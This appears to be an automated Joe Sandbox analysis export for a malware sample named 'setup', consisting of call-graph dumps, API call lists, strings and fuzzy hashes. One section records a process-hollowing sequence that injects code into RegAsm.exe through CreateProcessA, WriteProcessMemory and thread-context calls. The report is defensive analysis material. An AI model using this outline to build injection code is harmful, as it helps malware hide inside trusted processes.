afce24 6 API calls _unexpected 20509->20513 20511 afc6c9 __dosmaperr 20510->20511 20515 af029d 14 API calls __Wcrtomb 20511->20515 20513->20497 20514->20500 20515->20509 20516->20503 20517->20349 20518->20351 20519->20355 20520->20360 20521->20368 20522->20373 20523->20361 20525->20367 20526->20354 20528->20299 20531 ae37d7 20530->20531 20532 ae37eb 20531->20532 20533 ae6890 51 API calls 20531->20533 20532->20311 20534 ae3807 20533->20534 20534->20311 20535->20309 20536 aecf9a 20535->20536 20542 aeeabc 8 API calls ___vcrt_FlsGetValue 20536->20542 20538 aecf9f 20538->20309 20539->20310 20540->20315 20541->20317 20542->20538 20543->20325 20568 ae1490 20544->20568 20546 ae83ee 20547 aeb534 std::_Facet_Register 16 API calls 20546->20547 20548 ae842a 20547->20548 20549 ae843c 20548->20549 20637 ae3000 46 API calls 2 library calls 20548->20637 20582 ae3a40 20549->20582 20556 ae847e _Yarn 20629 ae53d0 20556->20629 20558 ae84c8 std::ios_base::_Ios_base_dtor 20560 aeb577 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20558->20560 20562 ae84df 20560->20562 20561 ae84e3 20638 af008f 41 API calls 2 library calls 20561->20638 20569 ae14c3 20568->20569 20570 ae14a0 20568->20570 20573 ae14d4 20569->20573 20575 aeb534 std::_Facet_Register 16 API calls 20569->20575 20571 ae14da 20570->20571 20572 ae14a7 20570->20572 20639 ae4df0 RaiseException Concurrency::cancel_current_task std::_Facet_Register 20571->20639 20574 aeb534 std::_Facet_Register 16 API calls 20572->20574 20573->20546 20577 ae14ad 20574->20577 20578 ae14cd 20575->20578 20580 ae14b6 20577->20580 20640 af008f 41 API calls 2 library calls 20577->20640 20578->20546 20580->20546 20583 ae37c0 51 API calls 20582->20583 20584 ae3a7e 20583->20584 20585 ae3aa7 20584->20585 20641 ae2800 72 API calls 5 library calls 20584->20641 20586 ae3b58 20585->20586 20591 ae3b93 20585->20591 20587 ae935a 8 API calls 20586->20587 20589 ae3b5d 20587->20589 20590 ae3b6b 20589->20590 20642 ae4c30 43 API calls 20589->20642 20597 ae2090 20590->20597 20643 ae3670 43 API calls 2 library calls 20591->20643 20594 ae3bc5 20644 aec3f0 RaiseException 20594->20644 20596 ae3bd3 20598 ae20b0 20597->20598 20599 ae2450 75 API calls 20598->20599 20601 ae20ba 20599->20601 20645 ae7cd0 20601->20645 20603 ae6890 51 API calls 20604 ae20f5 VirtualAlloc 20603->20604 20605 ae5560 20604->20605 20606 aeb534 std::_Facet_Register 16 API calls 20605->20606 20607 ae557f std::ios_base::_Ios_base_dtor 20606->20607 20609 ae5763 20607->20609 20610 ae5643 20607->20610 20674 ae1860 43 API calls 2 library calls 20607->20674 20677 af008f 41 API calls 2 library calls 20609->20677 20612 ae56ac _Yarn 20610->20612 20615 ae5688 20610->20615 20616 ae5759 20610->20616 20612->20609 20661 ae5770 20612->20661 20618 ae569b 20615->20618 20619 ae56c6 20615->20619 20675 ae4ed0 43 API calls 20616->20675 20620 ae575e 20618->20620 20621 ae56a6 20618->20621 20619->20612 20624 aeb534 std::_Facet_Register 16 API calls 20619->20624 20676 ae4df0 RaiseException Concurrency::cancel_current_task std::_Facet_Register 20620->20676 20623 aeb534 std::_Facet_Register 16 API calls 20621->20623 20623->20612 20624->20612 20625 ae570e std::ios_base::_Ios_base_dtor 20625->20609 20626 ae573c std::ios_base::_Ios_base_dtor 20625->20626 20627 aeb577 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20626->20627 20628 ae5755 20627->20628 20628->20556 20630 aeb534 std::_Facet_Register 16 API calls 20629->20630 20631 ae53f3 20630->20631 20632 ae2090 83 API calls 20631->20632 20633 ae1200 51 API calls 20631->20633 20634 ae5518 std::ios_base::_Ios_base_dtor 20631->20634 20632->20631 20633->20631 20635 aeb577 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20634->20635 20636 ae554b 20635->20636 20636->20558 20636->20561 20637->20549 20641->20585 20642->20590 20643->20594 20644->20596 20646 ae37c0 51 API calls 20645->20646 20647 ae7d0e 20646->20647 20648 ae7d98 20647->20648 20651 ae7dd3 20647->20651 20649 ae935a 8 API calls 20648->20649 20650 ae7d9d 20649->20650 20652 ae20ee 20650->20652 20658 ae4c30 43 API calls 20650->20658 20659 ae3670 43 API calls 2 library calls 20651->20659 20652->20603 20655 ae7e05 20660 aec3f0 RaiseException 20655->20660 20657 ae7e13 20658->20652 20659->20655 20660->20657 20662 ae5880 20661->20662 20673 ae579a std::ios_base::_Ios_base_dtor 20661->20673 20663 ae58ab std::ios_base::_Ios_base_dtor 20662->20663 20665 ae58c9 20662->20665 20664 aeb577 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20663->20664 20666 ae58c3 20664->20666 20680 af008f 41 API calls 2 library calls 20665->20680 20666->20625 20669 ae1200 51 API calls 20669->20673 20670 ae2090 83 API calls 20670->20673 20673->20662 20673->20665 20673->20669 20673->20670 20678 ae5060 43 API calls 3 library calls 20673->20678 20679 af0cbe 44 API calls _Fputc 20673->20679 20674->20607 20678->20673 20679->20673 20897 147018d 20900 14701c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 20897->20900 20899 14703a2 WriteProcessMemory 20901 14703e7 20899->20901 20900->20899 20902 14703ec WriteProcessMemory 20901->20902 20903 1470429 WriteProcessMemory Wow64SetThreadContext ResumeThread 20901->20903 20902->20901 21045 afe27a 55 API calls 4 library calls 20950 ae104d 50 API calls 20951 b05c53 GetProcessHeap 20952 ae3c4a 72 API calls std::ios_base::_Ios_base_dtor 21048 ae5a40 20 API calls 2 library calls 20953 b03442 GetCommandLineA GetCommandLineW 21051 aeb65b 42 API calls 21053 b0824d IsProcessorFeaturePresent 21054 afd251 46 API calls 2 library calls 20955 aeb5a8 49 API calls __RTC_Initialize 20956 aea9a6 70 API calls 2 library calls 21055 aeb7a2 24 API calls CallUnexpected 20960 ae59b0 GetStringTypeW __Getwctypes 21062 b0279b 42 API calls 6 library calls 20962 ae8980 55 API calls 2 library calls 20963 aead81 46 API calls __EH_prolog3_GS 20964 ae6590 LCMapStringEx __Towlower 21067 aeb7e9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 20904 af01e5 20905 afc69c ___free_lconv_mon 14 API calls 20904->20905 20906 af01fd 20905->20906 21068 ae7fe0 70 API calls 20968 af75f8 7 API calls __wsopen_s 20970 ae81f0 68 API calls 21072 afcfca FreeLibrary 21078 b04b3e 43 API calls 4 library calls 21079 ae5b20 78 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 20979 aead3f 70 API calls 20980 ae1139 std::_Init_wcerr::_Init_wcerr 21081 af7b35 49 API calls 5 library calls 20982 ae8530 45 API calls 3 library calls 21083 ae6730 16 API calls 20983 aeed0f 52 API calls 4 library calls 20984 b00d11 20 API calls 21086 ae7b00 43 API calls 21087 aef301 54 API calls 3 library calls 20992 af916d 44 API calls ___free_lconv_mon 20996 ae7960 69 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21092 ae1377 51 API calls Concurrency::cancel_current_task 21001 ae914a DeleteCriticalSection 21004 ae6540 51 API calls 21094 ae135e 43 API calls 21099 aec352 41 API calls __purecall

              Control-flow Graph

              APIs
              • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,014700FF,014700EF), ref: 014702FC
              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0147030F
              • Wow64GetThreadContext.KERNEL32(0000029C,00000000), ref: 0147032D
              • ReadProcessMemory.KERNELBASE(000002A0,?,01470143,00000004,00000000), ref: 01470351
              • VirtualAllocEx.KERNELBASE(000002A0,?,?,00003000,00000040), ref: 0147037C
              • WriteProcessMemory.KERNELBASE(000002A0,00000000,?,?,00000000,?), ref: 014703D4
              • WriteProcessMemory.KERNELBASE(000002A0,00400000,?,?,00000000,?,00000028), ref: 0147041F
              • WriteProcessMemory.KERNELBASE(000002A0,?,?,00000004,00000000), ref: 0147045D
              • Wow64SetThreadContext.KERNEL32(0000029C,01480000), ref: 01470499
              • ResumeThread.KERNELBASE(0000029C), ref: 014704A8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2182186387.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1470000_setup.jbxd
              Similarity
              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
              • API String ID: 2687962208-1257834847
              • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
              • Instruction ID: 1242b75a35b54b7d74c6c1e05b5068240e9e83f4f50e5014721c8df2a7b4c826
              • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
              • Instruction Fuzzy Hash: A5B1E57260128AAFDB60CF68CC80BDA77A5FF88714F158525FA0CAB351D774FA418B94

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 92 ae8ec0-ae8f1f call ae69e0 CreateThread WaitForSingleObject CloseHandle call ae15e0 96 ae8f24-ae8fcc call ae15e0 * 2 call ae1680 92->96 103 ae8fd0-ae8fda 96->103 104 ae8fdc-ae8feb 103->104 105 ae900d-ae9022 103->105 106 ae8fed-ae8ffb 104->106 107 ae9003-ae900a call aeb564 104->107 105->103 108 ae9024-ae902f 105->108 109 ae90e6-ae90eb call af008f 106->109 110 ae9001 106->110 107->105 112 ae90bd-ae90e3 GetNumberOfEventLogRecords call ae4e30 call aeb577 108->112 113 ae9035 108->113 110->107 117 ae9036-ae903c 113->117 120 ae903e 117->120 121 ae9040-ae9089 call ae1e80 call ae2610 117->121 120->121 130 ae908b-ae9094 121->130 131 ae90a2-ae90b6 call ae7e20 call ae6890 121->131 135 ae909e 130->135 136 ae9096-ae909a 130->136 131->117 139 ae90bc 131->139 135->131 136->135 139->112
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,Function_000083C0,00000000,00000000,00000000), ref: 00AE8EE4
              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00AE8EEF
              • CloseHandle.KERNEL32(00000000), ref: 00AE8EF6
              • GetNumberOfEventLogRecords.ADVAPI32(00000000,00000000), ref: 00AE90C1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: CloseCreateEventHandleNumberObjectRecordsSingleThreadWait
              • String ID: Agent Smith$Alister$Black John
              • API String ID: 1199335263-3422570730
              • Opcode ID: e95d525c1d1969b57a16f80d08622676ca58517404bf53b70d18428601b3d39a
              • Instruction ID: 392a0251f40da1908ea70b208509f3e4dc7ed597dd40315af13ebbb39c69e4ea
              • Opcode Fuzzy Hash: e95d525c1d1969b57a16f80d08622676ca58517404bf53b70d18428601b3d39a
              • Instruction Fuzzy Hash: 8A51CC716043809FD324DF25C856B2FBBE1BF94304F148A1CF5869B291EBB4E944CB92

              Control-flow Graph

              APIs
                • Part of subcall function 00B091AB: CreateFileW.KERNELBASE(?,00000000,?,00B0959B,?,?,00000000,?,00B0959B,?,0000000C), ref: 00B091C8
              • GetLastError.KERNEL32 ref: 00B09606
              • __dosmaperr.LIBCMT ref: 00B0960D
              • GetFileType.KERNEL32(00000000), ref: 00B09619
              • GetLastError.KERNEL32 ref: 00B09623
              • __dosmaperr.LIBCMT ref: 00B0962C
              • CloseHandle.KERNEL32(00000000), ref: 00B0964C
              • CloseHandle.KERNEL32(00B02137), ref: 00B09799
              • GetLastError.KERNEL32 ref: 00B097CB
              • __dosmaperr.LIBCMT ref: 00B097D2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: e0a14b032e3c256df20765b890dfb7b55d258407e4a9ea069ef688ee32de448e
              • Instruction ID: 9ecffa8eeedd3f408f47545da9832cf77622b758033b847a55d46bd3d74d3d96
              • Opcode Fuzzy Hash: e0a14b032e3c256df20765b890dfb7b55d258407e4a9ea069ef688ee32de448e
              • Instruction Fuzzy Hash: 00A12432A142189FDF199F68DC95BAE7FE1EB06310F140199F912AB3E2DB358D12CB51

              Control-flow Graph

              APIs
              • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,?), ref: 00AE846E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID: MZx
              • API String ID: 4275171209-2575928145
              • Opcode ID: cf9fdfe4b0a010c176006009e7ec49bc9322850273f8507cec73c5b0318a4166
              • Instruction ID: 518168d809225735053b70ed0ccfd9928c2de90e4e039041828c29326f1c42f2
              • Opcode Fuzzy Hash: cf9fdfe4b0a010c176006009e7ec49bc9322850273f8507cec73c5b0318a4166
              • Instruction Fuzzy Hash: 25412371A002989BDB00EB759D45BEEB7F4EF58314F140259F905B72D2EB75AA808B60

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 218 afc69c-afc6a5 219 afc6a7-afc6ba RtlFreeHeap 218->219 220 afc6d4-afc6d5 218->220 219->220 221 afc6bc-afc6d3 GetLastError call af0200 call af029d 219->221 221->220
              APIs
              • RtlFreeHeap.NTDLL(00000000,00000000,?,00B04071,?,00000000,?,?,00B04312,?,00000007,?,?,00B0480B,?,?), ref: 00AFC6B2
              • GetLastError.KERNEL32(?,?,00B04071,?,00000000,?,?,00B04312,?,00000007,?,?,00B0480B,?,?), ref: 00AFC6BD
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorFreeHeapLast
              • String ID:
              • API String ID: 485612231-0
              • Opcode ID: 8dd5f799b28ed1b8157b13f328178fc4d1d816e6dfda2f49db99564452689f60
              • Instruction ID: b777ce06749db12b829d0f4b79a8241205bb92d1f0951c885d9d442a78111488
              • Opcode Fuzzy Hash: 8dd5f799b28ed1b8157b13f328178fc4d1d816e6dfda2f49db99564452689f60
              • Instruction Fuzzy Hash: 9AE08C3214020CABEB112FE1AE0DBA93F98AB507A5F114020F708C7061EF348840C798

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 226 b020f8-b0211e call b01ece 229 b02120-b02132 call b094d2 226->229 230 b02177-b0217a 226->230 232 b02137-b0213c 229->232 232->230 233 b0213e-b02176 232->233
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: __wsopen_s
              • String ID:
              • API String ID: 3347428461-0
              • Opcode ID: f5d9e93b0436d84952b47deecd6e5fc4543bf728a69cbfa158d3141cdcd09e51
              • Instruction ID: 5a3355722f86805e7820327ff6649ad02c6d2841fe9d683e3beefc37e80fba01
              • Opcode Fuzzy Hash: f5d9e93b0436d84952b47deecd6e5fc4543bf728a69cbfa158d3141cdcd09e51
              • Instruction Fuzzy Hash: 1E112775A0420AAFCF05DF58E94599F7BF4EF48304F0440A9F909EB391D670EA16CB65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 234 b091ab-b091cf CreateFileW
              APIs
              • CreateFileW.KERNELBASE(?,00000000,?,00B0959B,?,?,00000000,?,00B0959B,?,0000000C), ref: 00B091C8
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 8dd9953f5e5d5d4877ff121dac901247176a672984de4d8df4f26a735c3ac21e
              • Instruction ID: 761937f4cc838be953479b84dc59f74f43d75d506128ef91c5ff1afcfe6ddcf6
              • Opcode Fuzzy Hash: 8dd9953f5e5d5d4877ff121dac901247176a672984de4d8df4f26a735c3ac21e
              • Instruction Fuzzy Hash: 2FD06C3200010DFBDF028F84DC06EDA3FAAFB48714F118100BA1856060C732E861EB90
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 12c74f67bb93a50dbecc277d25d1688207c17eb4fc13b95b859cd9c6f8dd5318
              • Instruction ID: 4272621899a7c401f57f38530e02f602b08d61e2660939ae40b5a0f4f4ad3646
              • Opcode Fuzzy Hash: 12c74f67bb93a50dbecc277d25d1688207c17eb4fc13b95b859cd9c6f8dd5318
              • Instruction Fuzzy Hash: 75D22A72E482298FDB65CE28DD407EABBF5EB44304F1445EAD44DE7280EB74AE858F41
              APIs
              • GetLocaleInfoW.KERNEL32(?,2000000B,00B05B3A,00000002,00000000,?,?,?,00B05B3A,?,00000000), ref: 00B058B5
              • GetLocaleInfoW.KERNEL32(?,20001004,00B05B3A,00000002,00000000,?,?,?,00B05B3A,?,00000000), ref: 00B058DE
              • GetACP.KERNEL32(?,?,00B05B3A,?,00000000), ref: 00B058F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID: ACP$OCP
              • API String ID: 2299586839-711371036
              • Opcode ID: ac1b9fa6fa3055f4fc95903993190f495bfbd18739d09b4fd7f5a967a48963c1
              • Instruction ID: 8faf8f5dc517b0e47f728e87a0a73cf5dd51efe24a362a4b3d188285390e6de5
              • Opcode Fuzzy Hash: ac1b9fa6fa3055f4fc95903993190f495bfbd18739d09b4fd7f5a967a48963c1
              • Instruction Fuzzy Hash: 6621C122A00B01AADB348B55C944B977FE6EF54B50B5AC5A4ED0AD7980FB32DD80CB90
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B05AFD
              • IsValidCodePage.KERNEL32(00000000), ref: 00B05B46
              • IsValidLocale.KERNEL32(?,00000001), ref: 00B05B55
              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B05B9D
              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B05BBC
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
              • String ID:
              • API String ID: 415426439-0
              • Opcode ID: f4b68b3e61dbef5704f29a2ac60d46ad6490a75c4cce105ea3419fb5e6016b62
              • Instruction ID: a581c09a17dee08a928c768581f4cd6a224285278aaf850ec5a91fee2b4ec41e
              • Opcode Fuzzy Hash: f4b68b3e61dbef5704f29a2ac60d46ad6490a75c4cce105ea3419fb5e6016b62
              • Instruction Fuzzy Hash: 55515D71A00A09AEDB20DFA5DC81ABF7BF8EF44700F5445A9A911E7591EB709940CF61
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • GetACP.KERNEL32(?,?,?,?,?,?,00AFA096,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B0514E
              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AFA096,?,?,?,00000055,?,-00000050,?,?), ref: 00B05179
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00B052DC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast$CodeInfoLocalePageValid
              • String ID: utf8
              • API String ID: 607553120-905460609
              • Opcode ID: a448ddb86ad03821001466e369df176688322b3de4a7bbf733606f77061afa74
              • Instruction ID: b4d6846bb181a3261ae5c7f266ca230be335874c336b397611146e7a751d20e4
              • Opcode Fuzzy Hash: a448ddb86ad03821001466e369df176688322b3de4a7bbf733606f77061afa74
              • Instruction Fuzzy Hash: D971D771600B0AAADB34AB74CC46BAB7BECEF04740F1444A9F605D75D1EB70ED408BA4
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: e0c59bc8d8984e6666305cd212fafe6242b5c06bf72fe89a7c197a62456e8f0b
              • Instruction ID: e2de3699bc9ba304f57da138f2e2345408d63260846d8f06f58f041c2f5a8064
              • Opcode Fuzzy Hash: e0c59bc8d8984e6666305cd212fafe6242b5c06bf72fe89a7c197a62456e8f0b
              • Instruction Fuzzy Hash: 56B135329142599FDB159F68C881BFEBFE5EF59340F1481EAF905AB282D235DD01CBA0
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AEC079
              • IsDebuggerPresent.KERNEL32 ref: 00AEC145
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AEC15E
              • UnhandledExceptionFilter.KERNEL32(?), ref: 00AEC168
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: cf680580128600e421efc92aecdab390a78a780ed4a02c2c30481b63b1f06205
              • Instruction ID: d252de08d574fc59f9a58bddf2a458ddbd5b4c6d3c47ba2a1bf6e751d2255762
              • Opcode Fuzzy Hash: cf680580128600e421efc92aecdab390a78a780ed4a02c2c30481b63b1f06205
